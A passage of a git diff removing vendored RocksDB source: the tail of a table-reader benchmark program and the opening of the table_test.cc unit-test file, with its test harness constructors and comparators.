-// If through_db=true, a full DB will be created and queries will be against
-// it. Otherwise, operations will be directly through table level.
-//
-// If for_terator=true, instead of just query one key each time, it queries
-// a range sharing the same prefix.
-namespace {
-void TableReaderBenchmark(Options& opts, EnvOptions& env_options,
-                          ReadOptions& read_options, int num_keys1,
-                          int num_keys2, int num_iter, int prefix_len,
-                          bool if_query_empty_keys, bool for_iterator,
-                          bool through_db, bool measured_by_nanosecond) {
-  rocksdb::InternalKeyComparator ikc(opts.comparator);
-
-  std::string file_name = test::TmpDir()
-      + "/rocksdb_table_reader_benchmark";
-  std::string dbname = test::TmpDir() + "/rocksdb_table_reader_bench_db";
-  WriteOptions wo;
-  Env* env = Env::Default();
-  TableBuilder* tb = nullptr;
-  DB* db = nullptr;
-  Status s;
-  const ImmutableCFOptions ioptions(opts);
-  unique_ptr<WritableFileWriter> file_writer;
-  if (!through_db) {
-    unique_ptr<WritableFile> file;
-    env->NewWritableFile(file_name, &file, env_options);
-
-    std::vector<std::unique_ptr<IntTblPropCollectorFactory> >
-        int_tbl_prop_collector_factories;
-
-    file_writer.reset(new WritableFileWriter(std::move(file), env_options));
-    int unknown_level = -1;
-    tb = opts.table_factory->NewTableBuilder(
-        TableBuilderOptions(ioptions, ikc, &int_tbl_prop_collector_factories,
-                            CompressionType::kNoCompression,
-                            CompressionOptions(),
-                            nullptr /* compression_dict */,
-                            false /* skip_filters */, kDefaultColumnFamilyName,
-                            unknown_level),
-        0 /* column_family_id */, file_writer.get());
-  } else {
-    s = DB::Open(opts, dbname, &db);
-    ASSERT_OK(s);
-    ASSERT_TRUE(db != nullptr);
-  }
-  // Populate slightly more than 1M keys
-  for (int i = 0; i < num_keys1; i++) {
-    for (int j = 0; j < num_keys2; j++) {
-      std::string key = MakeKey(i * 2, j, through_db);
-      if (!through_db) {
-        tb->Add(key, key);
-      } else {
-        db->Put(wo, key, key);
-      }
-    }
-  }
-  if (!through_db) {
-    tb->Finish();
-    file_writer->Close();
-  } else {
-    db->Flush(FlushOptions());
-  }
-
-  unique_ptr<TableReader> table_reader;
-  if (!through_db) {
-    unique_ptr<RandomAccessFile> raf;
-    s = env->NewRandomAccessFile(file_name, &raf, env_options);
-    if (!s.ok()) {
-      fprintf(stderr, "Create File Error: %s\n", s.ToString().c_str());
-      exit(1);
-    }
-    uint64_t file_size;
-    env->GetFileSize(file_name, &file_size);
-    unique_ptr<RandomAccessFileReader> file_reader(
-        new RandomAccessFileReader(std::move(raf), file_name));
-    s = opts.table_factory->NewTableReader(
-        TableReaderOptions(ioptions, env_options, ikc), std::move(file_reader),
-        file_size, &table_reader);
-    if (!s.ok()) {
-      fprintf(stderr, "Open Table Error: %s\n", s.ToString().c_str());
-      exit(1);
-    }
-  }
-
-  Random rnd(301);
-  std::string result;
-  HistogramImpl hist;
-
-  for (int it = 0; it < num_iter; it++) {
-    for (int i = 0; i < num_keys1; i++) {
-      for (int j = 0; j < num_keys2; j++) {
-        int r1 = rnd.Uniform(num_keys1) * 2;
-        int r2 = rnd.Uniform(num_keys2);
-        if (if_query_empty_keys) {
-          r1++;
-          r2 = num_keys2 * 2 - r2;
-        }
-
-        if (!for_iterator) {
-          // Query one existing key;
-          std::string key = MakeKey(r1, r2, through_db);
-          uint64_t start_time = Now(env, measured_by_nanosecond);
-          if (!through_db) {
-            PinnableSlice value;
-            MergeContext merge_context;
-            RangeDelAggregator range_del_agg(ikc, {} /* snapshots */);
-            GetContext get_context(ioptions.user_comparator,
-                                   ioptions.merge_operator, ioptions.info_log,
-                                   ioptions.statistics, GetContext::kNotFound,
-                                   Slice(key), &value, nullptr, &merge_context,
-                                   &range_del_agg, env);
-            s = table_reader->Get(read_options, key, &get_context);
-          } else {
-            s = db->Get(read_options, key, &result);
-          }
-          hist.Add(Now(env, measured_by_nanosecond) - start_time);
-        } else {
-          int r2_len;
-          if (if_query_empty_keys) {
-            r2_len = 0;
-          } else {
-            r2_len = rnd.Uniform(num_keys2) + 1;
-            if (r2_len + r2 > num_keys2) {
-              r2_len = num_keys2 - r2;
-            }
-          }
-          std::string start_key = MakeKey(r1, r2, through_db);
-          std::string end_key = MakeKey(r1, r2 + r2_len, through_db);
-          uint64_t total_time = 0;
-          uint64_t start_time = Now(env, measured_by_nanosecond);
-          Iterator* iter = nullptr;
-          InternalIterator* iiter = nullptr;
-          if (!through_db) {
-            iiter = table_reader->NewIterator(read_options);
-          } else {
-            iter = db->NewIterator(read_options);
-          }
-          int count = 0;
-          for (through_db ? iter->Seek(start_key) : iiter->Seek(start_key);
-               through_db ? iter->Valid() : iiter->Valid();
-               through_db ? iter->Next() : iiter->Next()) {
-            if (if_query_empty_keys) {
-              break;
-            }
-            // verify key;
-            total_time += Now(env, measured_by_nanosecond) - start_time;
-            assert(Slice(MakeKey(r1, r2 + count, through_db)) ==
-                   (through_db ? iter->key() : iiter->key()));
-            start_time = Now(env, measured_by_nanosecond);
-            if (++count >= r2_len) {
-              break;
-            }
-          }
-          if (count != r2_len) {
-            fprintf(
-                stderr, "Iterator cannot iterate expected number of entries. "
-                "Expected %d but got %d\n", r2_len, count);
-            assert(false);
-          }
-          delete iter;
-          total_time += Now(env, measured_by_nanosecond) - start_time;
-          hist.Add(total_time);
-        }
-      }
-    }
-  }
-
-  fprintf(
-      stderr,
-      "==================================================="
-      "====================================================\n"
-      "InMemoryTableSimpleBenchmark: %20s   num_key1:  %5d   "
-      "num_key2: %5d  %10s\n"
-      "==================================================="
-      "===================================================="
-      "\nHistogram (unit: %s): \n%s",
-      opts.table_factory->Name(), num_keys1, num_keys2,
-      for_iterator ? "iterator" : (if_query_empty_keys ? "empty" : "non_empty"),
-      measured_by_nanosecond ? "nanosecond" : "microsecond",
-      hist.ToString().c_str());
-  if (!through_db) {
-    env->DeleteFile(file_name);
-  } else {
-    delete db;
-    db = nullptr;
-    DestroyDB(dbname, opts);
-  }
-}
-}  // namespace
-}  // namespace rocksdb
-
-DEFINE_bool(query_empty, false, "query non-existing keys instead of existing "
-            "ones.");
-DEFINE_int32(num_keys1, 4096, "number of distinguish prefix of keys");
-DEFINE_int32(num_keys2, 512, "number of distinguish keys for each prefix");
-DEFINE_int32(iter, 3, "query non-existing keys instead of existing ones");
-DEFINE_int32(prefix_len, 16, "Prefix length used for iterators and indexes");
-DEFINE_bool(iterator, false, "For test iterator");
-DEFINE_bool(through_db, false, "If enable, a DB instance will be created and "
-            "the query will be against DB. Otherwise, will be directly against "
-            "a table reader.");
-DEFINE_bool(mmap_read, true, "Whether use mmap read");
-DEFINE_string(table_factory, "block_based",
-              "Table factory to use: `block_based` (default), `plain_table` or "
-              "`cuckoo_hash`.");
-DEFINE_string(time_unit, "microsecond",
-              "The time unit used for measuring performance. User can specify "
-              "`microsecond` (default) or `nanosecond`");
-
-int main(int argc, char** argv) {
-  SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                  " [OPTIONS]...");
-  ParseCommandLineFlags(&argc, &argv, true);
-
-  std::shared_ptr<rocksdb::TableFactory> tf;
-  rocksdb::Options options;
-  if (FLAGS_prefix_len < 16) {
-    options.prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(
-        FLAGS_prefix_len));
-  }
-  rocksdb::ReadOptions ro;
-  rocksdb::EnvOptions env_options;
-  options.create_if_missing = true;
-  options.compression = rocksdb::CompressionType::kNoCompression;
-
-  if (FLAGS_table_factory == "cuckoo_hash") {
-#ifndef ROCKSDB_LITE
-    options.allow_mmap_reads = FLAGS_mmap_read;
-    env_options.use_mmap_reads = FLAGS_mmap_read;
-    rocksdb::CuckooTableOptions table_options;
-    table_options.hash_table_ratio = 0.75;
-    tf.reset(rocksdb::NewCuckooTableFactory(table_options));
-#else
-    fprintf(stderr, "Plain table is not supported in lite mode\n");
-    exit(1);
-#endif  // ROCKSDB_LITE
-  } else if (FLAGS_table_factory == "plain_table") {
-#ifndef ROCKSDB_LITE
-    options.allow_mmap_reads = FLAGS_mmap_read;
-    env_options.use_mmap_reads = FLAGS_mmap_read;
-
-    rocksdb::PlainTableOptions plain_table_options;
-    plain_table_options.user_key_len = 16;
-    plain_table_options.bloom_bits_per_key = (FLAGS_prefix_len == 16) ? 0 : 8;
-    plain_table_options.hash_table_ratio = 0.75;
-
-    tf.reset(new rocksdb::PlainTableFactory(plain_table_options));
-    options.prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(
-        FLAGS_prefix_len));
-#else
-    fprintf(stderr, "Cuckoo table is not supported in lite mode\n");
-    exit(1);
-#endif  // ROCKSDB_LITE
-  } else if (FLAGS_table_factory == "block_based") {
-    tf.reset(new rocksdb::BlockBasedTableFactory());
-  } else {
-    fprintf(stderr, "Invalid table type %s\n", FLAGS_table_factory.c_str());
-  }
-
-  if (tf) {
-    // if user provides invalid options, just fall back to microsecond.
-    bool measured_by_nanosecond = FLAGS_time_unit == "nanosecond";
-
-    options.table_factory = tf;
-    rocksdb::TableReaderBenchmark(options, env_options, ro, FLAGS_num_keys1,
-                                  FLAGS_num_keys2, FLAGS_iter, FLAGS_prefix_len,
-                                  FLAGS_query_empty, FLAGS_iterator,
-                                  FLAGS_through_db, measured_by_nanosecond);
-  } else {
-    return 1;
-  }
-
-  return 0;
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/table/table_test.cc b/thirdparty/rocksdb/table/table_test.cc
deleted file mode 100644
index 178cf42..0000000
--- a/thirdparty/rocksdb/table/table_test.cc
+++ /dev/null
@@ -1,3108 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <stdio.h>
-
-#include <algorithm>
-#include <iostream>
-#include <map>
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "cache/lru_cache.h"
-#include "db/dbformat.h"
-#include "db/memtable.h"
-#include "db/write_batch_internal.h"
-#include "memtable/stl_wrappers.h"
-#include "monitoring/statistics.h"
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/block.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_based_table_factory.h"
-#include "table/block_based_table_reader.h"
-#include "table/block_builder.h"
-#include "table/format.h"
-#include "table/get_context.h"
-#include "table/internal_iterator.h"
-#include "table/meta_blocks.h"
-#include "table/plain_table_factory.h"
-#include "table/scoped_arena_iterator.h"
-#include "table/sst_file_writer_collectors.h"
-#include "util/compression.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-extern const uint64_t kLegacyBlockBasedTableMagicNumber;
-extern const uint64_t kLegacyPlainTableMagicNumber;
-extern const uint64_t kBlockBasedTableMagicNumber;
-extern const uint64_t kPlainTableMagicNumber;
-
-namespace {
-
-// DummyPropertiesCollector used to test BlockBasedTableProperties
-class DummyPropertiesCollector : public TablePropertiesCollector {
- public:
-  const char* Name() const { return ""; }
-
-  Status Finish(UserCollectedProperties* properties) { return Status::OK(); }
-
-  Status Add(const Slice& user_key, const Slice& value) { return Status::OK(); }
-
-  virtual UserCollectedProperties GetReadableProperties() const {
-    return UserCollectedProperties{};
-  }
-};
-
-class DummyPropertiesCollectorFactory1
-    : public TablePropertiesCollectorFactory {
- public:
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) {
-    return new DummyPropertiesCollector();
-  }
-  const char* Name() const { return "DummyPropertiesCollector1"; }
-};
-
-class DummyPropertiesCollectorFactory2
-    : public TablePropertiesCollectorFactory {
- public:
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) {
-    return new DummyPropertiesCollector();
-  }
-  const char* Name() const { return "DummyPropertiesCollector2"; }
-};
-
-// Return reverse of "key".
-// Used to test non-lexicographic comparators.
-std::string Reverse(const Slice& key) {
-  auto rev = key.ToString();
-  std::reverse(rev.begin(), rev.end());
-  return rev;
-}
-
-class ReverseKeyComparator : public Comparator {
- public:
-  virtual const char* Name() const override {
-    return "rocksdb.ReverseBytewiseComparator";
-  }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    return BytewiseComparator()->Compare(Reverse(a), Reverse(b));
-  }
-
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {
-    std::string s = Reverse(*start);
-    std::string l = Reverse(limit);
-    BytewiseComparator()->FindShortestSeparator(&s, l);
-    *start = Reverse(s);
-  }
-
-  virtual void FindShortSuccessor(std::string* key) const override {
-    std::string s = Reverse(*key);
-    BytewiseComparator()->FindShortSuccessor(&s);
-    *key = Reverse(s);
-  }
-};
-
-ReverseKeyComparator reverse_key_comparator;
-
-void Increment(const Comparator* cmp, std::string* key) {
-  if (cmp == BytewiseComparator()) {
-    key->push_back('\0');
-  } else {
-    assert(cmp == &reverse_key_comparator);
-    std::string rev = Reverse(*key);
-    rev.push_back('\0');
-    *key = Reverse(rev);
-  }
-}
-
-}  // namespace
-
-// Helper class for tests to unify the interface between
-// BlockBuilder/TableBuilder and Block/Table.
-class Constructor {
- public:
-  explicit Constructor(const Comparator* cmp)
-      : data_(stl_wrappers::LessOfComparator(cmp)) {}
-  virtual ~Constructor() { }
-
-  void Add(const std::string& key, const Slice& value) {
-    data_[key] = value.ToString();
-  }
-
-  // Finish constructing the data structure with all the keys that have
-  // been added so far.  Returns the keys in sorted order in "*keys"
-  // and stores the key/value pairs in "*kvmap"
-  void Finish(const Options& options, const ImmutableCFOptions& ioptions,
-              const BlockBasedTableOptions& table_options,
-              const InternalKeyComparator& internal_comparator,
-              std::vector<std::string>* keys, stl_wrappers::KVMap* kvmap) {
-    last_internal_key_ = &internal_comparator;
-    *kvmap = data_;
-    keys->clear();
-    for (const auto& kv : data_) {
-      keys->push_back(kv.first);
-    }
-    data_.clear();
-    Status s = FinishImpl(options, ioptions, table_options,
-                          internal_comparator, *kvmap);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-  }
-
-  // Construct the data structure from the data in "data"
-  virtual Status FinishImpl(const Options& options,
-                            const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
-                            const InternalKeyComparator& internal_comparator,
-                            const stl_wrappers::KVMap& data) = 0;
-
-  virtual InternalIterator* NewIterator() const = 0;
-
-  virtual const stl_wrappers::KVMap& data() { return data_; }
-
-  virtual bool IsArenaMode() const { return false; }
-
-  virtual DB* db() const { return nullptr; }  // Overridden in DBConstructor
-
-  virtual bool AnywayDeleteIterator() const { return false; }
-
- protected:
-  const InternalKeyComparator* last_internal_key_;
-
- private:
-  stl_wrappers::KVMap data_;
-};
-
-class BlockConstructor: public Constructor {
- public:
-  explicit BlockConstructor(const Comparator* cmp)
-      : Constructor(cmp),
-        comparator_(cmp),
-        block_(nullptr) { }
-  ~BlockConstructor() {
-    delete block_;
-  }
-  virtual Status FinishImpl(const Options& options,
-                            const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
-                            const InternalKeyComparator& internal_comparator,
-                            const stl_wrappers::KVMap& kv_map) override {
-    delete block_;
-    block_ = nullptr;
-    BlockBuilder builder(table_options.block_restart_interval);
-
-    for (const auto kv : kv_map) {
-      builder.Add(kv.first, kv.second);
-    }
-    // Open the block
-    data_ = builder.Finish().ToString();
-    BlockContents contents;
-    contents.data = data_;
-    contents.cachable = false;
-    block_ = new Block(std::move(contents), kDisableGlobalSequenceNumber);
-    return Status::OK();
-  }
-  virtual InternalIterator* NewIterator() const override {
-    return block_->NewIterator(comparator_);
-  }
-
- private:
-  const Comparator* comparator_;
-  std::string data_;
-  Block* block_;
-
-  BlockConstructor();
-};
-
-// A helper class that converts internal format keys into user keys
-class KeyConvertingIterator : public InternalIterator {
- public:
-  explicit KeyConvertingIterator(InternalIterator* iter,
-                                 bool arena_mode = false)
-      : iter_(iter), arena_mode_(arena_mode) {}
-  virtual ~KeyConvertingIterator() {
-    if (arena_mode_) {
-      iter_->~InternalIterator();
-    } else {
-      delete iter_;
-    }
-  }
-  virtual bool Valid() const override { return iter_->Valid(); }
-  virtual void Seek(const Slice& target) override {
-    ParsedInternalKey ikey(target, kMaxSequenceNumber, kTypeValue);
-    std::string encoded;
-    AppendInternalKey(&encoded, ikey);
-    iter_->Seek(encoded);
-  }
-  virtual void SeekForPrev(const Slice& target) override {
-    ParsedInternalKey ikey(target, kMaxSequenceNumber, kTypeValue);
-    std::string encoded;
-    AppendInternalKey(&encoded, ikey);
-    iter_->SeekForPrev(encoded);
-  }
-  virtual void SeekToFirst() override { iter_->SeekToFirst(); }
-  virtual void SeekToLast() override { iter_->SeekToLast(); }
-  virtual void Next() override { iter_->Next(); }
-  virtual void Prev() override { iter_->Prev(); }
-
-  virtual Slice key() const override {
-    assert(Valid());
-    ParsedInternalKey parsed_key;
-    if (!ParseInternalKey(iter_->key(), &parsed_key)) {
-      status_ = Status::Corruption("malformed internal key");
-      return Slice("corrupted key");
-    }
-    return parsed_key.user_key;
-  }
-
-  virtual Slice value() const override { return iter_->value(); }
-  virtual Status status() const override {
-    return status_.ok() ? iter_->status() : status_;
-  }
-
- private:
-  mutable Status status_;
-  InternalIterator* iter_;
-  bool arena_mode_;
-
-  // No copying allowed
-  KeyConvertingIterator(const KeyConvertingIterator&);
-  void operator=(const KeyConvertingIterator&);
-};
-
-class TableConstructor: public Constructor {
- public:
-  explicit TableConstructor(const Comparator* cmp,
-                            bool convert_to_internal_key = false)
-      : Constructor(cmp),
-        convert_to_internal_key_(convert_to_internal_key) {}
-  ~TableConstructor() { Reset(); }
-
-  virtual Status FinishImpl(const Options& options,
-                            const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
-                            const InternalKeyComparator& internal_comparator,
-                            const stl_wrappers::KVMap& kv_map) override {
-    Reset();
-    soptions.use_mmap_reads = ioptions.allow_mmap_reads;
-    file_writer_.reset(test::GetWritableFileWriter(new test::StringSink()));
-    unique_ptr<TableBuilder> builder;
-    std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-        int_tbl_prop_collector_factories;
-    std::string column_family_name;
-    int unknown_level = -1;
-    builder.reset(ioptions.table_factory->NewTableBuilder(
-        TableBuilderOptions(ioptions, internal_comparator,
-                            &int_tbl_prop_collector_factories,
-                            options.compression, CompressionOptions(),
-                            nullptr /* compression_dict */,
-                            false /* skip_filters */, column_family_name,
-                            unknown_level),
-        TablePropertiesCollectorFactory::Context::kUnknownColumnFamily,
-        file_writer_.get()));
-
-    for (const auto kv : kv_map) {
-      if (convert_to_internal_key_) {
-        ParsedInternalKey ikey(kv.first, kMaxSequenceNumber, kTypeValue);
-        std::string encoded;
-        AppendInternalKey(&encoded, ikey);
-        builder->Add(encoded, kv.second);
-      } else {
-        builder->Add(kv.first, kv.second);
-      }
-      EXPECT_TRUE(builder->status().ok());
-    }
-    Status s = builder->Finish();
-    file_writer_->Flush();
-    EXPECT_TRUE(s.ok()) << s.ToString();
-
-    EXPECT_EQ(GetSink()->contents().size(), builder->FileSize());
-
-    // Open the table
-    uniq_id_ = cur_uniq_id_++;
-    file_reader_.reset(test::GetRandomAccessFileReader(new test::StringSource(
-        GetSink()->contents(), uniq_id_, ioptions.allow_mmap_reads)));
-    return ioptions.table_factory->NewTableReader(
-        TableReaderOptions(ioptions, soptions, internal_comparator),
-        std::move(file_reader_), GetSink()->contents().size(), &table_reader_);
-  }
-
-  virtual InternalIterator* NewIterator() const override {
-    ReadOptions ro;
-    InternalIterator* iter = table_reader_->NewIterator(ro);
-    if (convert_to_internal_key_) {
-      return new KeyConvertingIterator(iter);
-    } else {
-      return iter;
-    }
-  }
-
-  uint64_t ApproximateOffsetOf(const Slice& key) const {
-    if (convert_to_internal_key_) {
-      InternalKey ikey(key, kMaxSequenceNumber, kTypeValue);
-      const Slice skey = ikey.Encode();
-      return table_reader_->ApproximateOffsetOf(skey);
-    }
-    return table_reader_->ApproximateOffsetOf(key);
-  }
-
-  virtual Status Reopen(const ImmutableCFOptions& ioptions) {
-    file_reader_.reset(test::GetRandomAccessFileReader(new test::StringSource(
-        GetSink()->contents(), uniq_id_, ioptions.allow_mmap_reads)));
-    return ioptions.table_factory->NewTableReader(
-        TableReaderOptions(ioptions, soptions, *last_internal_key_),
-        std::move(file_reader_), GetSink()->contents().size(), &table_reader_);
-  }
-
-  virtual TableReader* GetTableReader() {
-    return table_reader_.get();
-  }
-
-  virtual bool AnywayDeleteIterator() const override {
-    return convert_to_internal_key_;
-  }
-
-  void ResetTableReader() { table_reader_.reset(); }
-
-  bool ConvertToInternalKey() { return convert_to_internal_key_; }
-
- private:
-  void Reset() {
-    uniq_id_ = 0;
-    table_reader_.reset();
-    file_writer_.reset();
-    file_reader_.reset();
-  }
-
-  test::StringSink* GetSink() {
-    return static_cast<test::StringSink*>(file_writer_->writable_file());
-  }
-
-  uint64_t uniq_id_;
-  unique_ptr<WritableFileWriter> file_writer_;
-  unique_ptr<RandomAccessFileReader> file_reader_;
-  unique_ptr<TableReader> table_reader_;
-  bool convert_to_internal_key_;
-
-  TableConstructor();
-
-  static uint64_t cur_uniq_id_;
-  EnvOptions soptions;
-};
-uint64_t TableConstructor::cur_uniq_id_ = 1;
-
-class MemTableConstructor: public Constructor {
- public:
-  explicit MemTableConstructor(const Comparator* cmp, WriteBufferManager* wb)
-      : Constructor(cmp),
-        internal_comparator_(cmp),
-        write_buffer_manager_(wb),
-        table_factory_(new SkipListFactory) {
-    options_.memtable_factory = table_factory_;
-    ImmutableCFOptions ioptions(options_);
-    memtable_ =
-        new MemTable(internal_comparator_, ioptions, MutableCFOptions(options_),
-                     wb, kMaxSequenceNumber, 0 /* column_family_id */);
-    memtable_->Ref();
-  }
-  ~MemTableConstructor() {
-    delete memtable_->Unref();
-  }
-  virtual Status FinishImpl(const Options&, const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
-                            const InternalKeyComparator& internal_comparator,
-                            const stl_wrappers::KVMap& kv_map) override {
-    delete memtable_->Unref();
-    ImmutableCFOptions mem_ioptions(ioptions);
-    memtable_ = new MemTable(internal_comparator_, mem_ioptions,
-                             MutableCFOptions(options_), write_buffer_manager_,
-                             kMaxSequenceNumber, 0 /* column_family_id */);
-    memtable_->Ref();
-    int seq = 1;
-    for (const auto kv : kv_map) {
-      memtable_->Add(seq, kTypeValue, kv.first, kv.second);
-      seq++;
-    }
-    return Status::OK();
-  }
-  virtual InternalIterator* NewIterator() const override {
-    return new KeyConvertingIterator(
-        memtable_->NewIterator(ReadOptions(), &arena_), true);
-  }
-
-  virtual bool AnywayDeleteIterator() const override { return true; }
-
-  virtual bool IsArenaMode() const override { return true; }
-
- private:
-  mutable Arena arena_;
-  InternalKeyComparator internal_comparator_;
-  Options options_;
-  WriteBufferManager* write_buffer_manager_;
-  MemTable* memtable_;
-  std::shared_ptr<SkipListFactory> table_factory_;
-};
-
-class InternalIteratorFromIterator : public InternalIterator {
- public:
-  explicit InternalIteratorFromIterator(Iterator* it) : it_(it) {}
-  virtual bool Valid() const override { return it_->Valid(); }
-  virtual void Seek(const Slice& target) override { it_->Seek(target); }
-  virtual void SeekForPrev(const Slice& target) override {
-    it_->SeekForPrev(target);
-  }
-  virtual void SeekToFirst() override { it_->SeekToFirst(); }
-  virtual void SeekToLast() override { it_->SeekToLast(); }
-  virtual void Next() override { it_->Next(); }
-  virtual void Prev() override { it_->Prev(); }
-  Slice key() const override { return it_->key(); }
-  Slice value() const override { return it_->value(); }
-  virtual Status status() const override { return it_->status(); }
-
- private:
-  unique_ptr<Iterator> it_;
-};
-
-class DBConstructor: public Constructor {
- public:
-  explicit DBConstructor(const Comparator* cmp)
-      : Constructor(cmp),
-        comparator_(cmp) {
-    db_ = nullptr;
-    NewDB();
-  }
-  ~DBConstructor() {
-    delete db_;
-  }
-  virtual Status FinishImpl(const Options& options,
-                            const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
-                            const InternalKeyComparator& internal_comparator,
-                            const stl_wrappers::KVMap& kv_map) override {
-    delete db_;
-    db_ = nullptr;
-    NewDB();
-    for (const auto kv : kv_map) {
-      WriteBatch batch;
-      batch.Put(kv.first, kv.second);
-      EXPECT_TRUE(db_->Write(WriteOptions(), &batch).ok());
-    }
-    return Status::OK();
-  }
-
-  virtual InternalIterator* NewIterator() const override {
-    return new InternalIteratorFromIterator(db_->NewIterator(ReadOptions()));
-  }
-
-  virtual DB* db() const override { return db_; }
-
- private:
-  void NewDB() {
-    std::string name = test::TmpDir() + "/table_testdb";
-
-    Options options;
-    options.comparator = comparator_;
-    Status status = DestroyDB(name, options);
-    ASSERT_TRUE(status.ok()) << status.ToString();
-
-    options.create_if_missing = true;
-    options.error_if_exists = true;
-    options.write_buffer_size = 10000;  // Something small to force merging
-    status = DB::Open(options, name, &db_);
-    ASSERT_TRUE(status.ok()) << status.ToString();
-  }
-
-  const Comparator* comparator_;
-  DB* db_;
-};
-
-enum TestType {
-  BLOCK_BASED_TABLE_TEST,
-#ifndef ROCKSDB_LITE
-  PLAIN_TABLE_SEMI_FIXED_PREFIX,
-  PLAIN_TABLE_FULL_STR_PREFIX,
-  PLAIN_TABLE_TOTAL_ORDER,
-#endif  // !ROCKSDB_LITE
-  BLOCK_TEST,
-  MEMTABLE_TEST,
-  DB_TEST
-};
-
-struct TestArgs {
-  TestType type;
-  bool reverse_compare;
-  int restart_interval;
-  CompressionType compression;
-  uint32_t format_version;
-  bool use_mmap;
-};
-
-static std::vector<TestArgs> GenerateArgList() {
-  std::vector<TestArgs> test_args;
-  std::vector<TestType> test_types = {
-      BLOCK_BASED_TABLE_TEST,
-#ifndef ROCKSDB_LITE
-      PLAIN_TABLE_SEMI_FIXED_PREFIX,
-      PLAIN_TABLE_FULL_STR_PREFIX,
-      PLAIN_TABLE_TOTAL_ORDER,
-#endif  // !ROCKSDB_LITE
-      BLOCK_TEST,
-      MEMTABLE_TEST, DB_TEST};
-  std::vector<bool> reverse_compare_types = {false, true};
-  std::vector<int> restart_intervals = {16, 1, 1024};
-
-  // Only add compression if it is supported
-  std::vector<std::pair<CompressionType, bool>> compression_types;
-  compression_types.emplace_back(kNoCompression, false);
-  if (Snappy_Supported()) {
-    compression_types.emplace_back(kSnappyCompression, false);
-  }
-  if (Zlib_Supported()) {
-    compression_types.emplace_back(kZlibCompression, false);
-    compression_types.emplace_back(kZlibCompression, true);
-  }
-  if (BZip2_Supported()) {
-    compression_types.emplace_back(kBZip2Compression, false);
-    compression_types.emplace_back(kBZip2Compression, true);
-  }
-  if (LZ4_Supported()) {
-    compression_types.emplace_back(kLZ4Compression, false);
-    compression_types.emplace_back(kLZ4Compression, true);
-    compression_types.emplace_back(kLZ4HCCompression, false);
-    compression_types.emplace_back(kLZ4HCCompression, true);
-  }
-  if (XPRESS_Supported()) {
-    compression_types.emplace_back(kXpressCompression, false);
-    compression_types.emplace_back(kXpressCompression, true);
-  }
-  if (ZSTD_Supported()) {
-    compression_types.emplace_back(kZSTD, false);
-    compression_types.emplace_back(kZSTD, true);
-  }
-
-  for (auto test_type : test_types) {
-    for (auto reverse_compare : reverse_compare_types) {
-#ifndef ROCKSDB_LITE
-      if (test_type == PLAIN_TABLE_SEMI_FIXED_PREFIX ||
-          test_type == PLAIN_TABLE_FULL_STR_PREFIX ||
-          test_type == PLAIN_TABLE_TOTAL_ORDER) {
-        // Plain table doesn't use restart index or compression.
-        TestArgs one_arg;
-        one_arg.type = test_type;
-        one_arg.reverse_compare = reverse_compare;
-        one_arg.restart_interval = restart_intervals[0];
-        one_arg.compression = compression_types[0].first;
-        one_arg.use_mmap = true;
-        test_args.push_back(one_arg);
-        one_arg.use_mmap = false;
-        test_args.push_back(one_arg);
-        continue;
-      }
-#endif  // !ROCKSDB_LITE
-
-      for (auto restart_interval : restart_intervals) {
-        for (auto compression_type : compression_types) {
-          TestArgs one_arg;
-          one_arg.type = test_type;
-          one_arg.reverse_compare = reverse_compare;
-          one_arg.restart_interval = restart_interval;
-          one_arg.compression = compression_type.first;
-          one_arg.format_version = compression_type.second ? 2 : 1;
-          one_arg.use_mmap = false;
-          test_args.push_back(one_arg);
-        }
-      }
-    }
-  }
-  return test_args;
-}
-
-// In order to make all tests run for plain table format, including
-// those operating on empty keys, create a new prefix transformer which
-// return fixed prefix if the slice is not shorter than the prefix length,
-// and the full slice if it is shorter.
-class FixedOrLessPrefixTransform : public SliceTransform {
- private:
-  const size_t prefix_len_;
-
- public:
-  explicit FixedOrLessPrefixTransform(size_t prefix_len) :
-      prefix_len_(prefix_len) {
-  }
-
-  virtual const char* Name() const override { return "rocksdb.FixedPrefix"; }
-
-  virtual Slice Transform(const Slice& src) const override {
-    assert(InDomain(src));
-    if (src.size() < prefix_len_) {
-      return src;
-    }
-    return Slice(src.data(), prefix_len_);
-  }
-
-  virtual bool InDomain(const Slice& src) const override { return true; }
-
-  virtual bool InRange(const Slice& dst) const override {
-    return (dst.size() <= prefix_len_);
-  }
-};
-
-class HarnessTest : public testing::Test {
- public:
-  HarnessTest()
-      : ioptions_(options_),
-        constructor_(nullptr),
-        write_buffer_(options_.db_write_buffer_size) {}
-
-  void Init(const TestArgs& args) {
-    delete constructor_;
